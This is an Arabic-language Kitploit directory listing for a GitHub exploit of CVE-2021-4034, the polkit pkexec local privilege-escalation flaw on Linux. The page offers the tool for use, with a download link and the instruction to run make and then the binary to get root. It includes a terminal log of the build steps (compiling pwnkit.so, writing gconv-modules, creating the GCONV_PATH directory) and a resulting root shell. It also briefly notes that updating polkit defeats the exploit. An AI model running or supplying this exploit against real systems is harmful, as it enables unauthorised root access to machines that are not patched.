Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-4034 — استغلال لثغرة CVE-2021-4034، وهي ثغرة تصعيد صلاحيات في polkit pkexec، توفر غلاف جذر (root shell) على أنظمة لينكس المعرضة للخطر. | Kitploit
أدوات/GitHubGitHub/an0n7os/cve-2021-4034
تصعيد الامتيازاتأطر الاستغلالتحليل الثغرات الأمنيةالاستغلالاستغلال الملفات الثنائية
GitHuban0n7os/cve-2021-4034

CVE-2021-4034

استغلال لثغرة CVE-2021-4034، وهي ثغرة تصعيد صلاحيات في polkit pkexec، توفر غلاف جذر (root shell) على أنظمة لينكس المعرضة للخطر.

عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-4034

استغلال تصعيد الصلاحيات في polkit

فقط نفّذ make، ثم ./cve-2021-4034 واستمتع بصلاحيات الجذر.

PoC

إذا كان الاستغلال يعمل، ستحصل على صلاحيات الجذر فورًا:

root@kitploit:~
vagrant@ubuntu-impish:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit

تحديث polkit على معظم الأنظمة سيصلح هذا الاستغلال، وبالتالي ستحصل على رسالة الاستخدام وسيخرج البرنامج:

root@kitploit:~
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
       --help |
       --disable-internal-agent |
       [--user username] PROGRAM [ARGUMENTS...]

See the pkexec manual page for more details.
vagrant@ubuntu-impish:~/CVE-2021-4034$

حول Polkit pkexec لأنظمة لينكس

Polkit (المعروف سابقًا باسم PolicyKit) هو مكوّن للتحكم في الصلاحيات على مستوى النظام في أنظمة التشغيل الشبيهة بيونكس. يوفر طريقة منظمة للعمليات غير المصرّح لها بالتواصل مع العمليات المصرّح لها. من الممكن أيضًا استخدام polkit لتنفيذ الأوامر بصلاحيات مرتفعة باستخدام الأمر pkexec متبوعًا بالأمر المطلوب تنفيذه (بصلاحيات الجذر).

تنزيل الأداة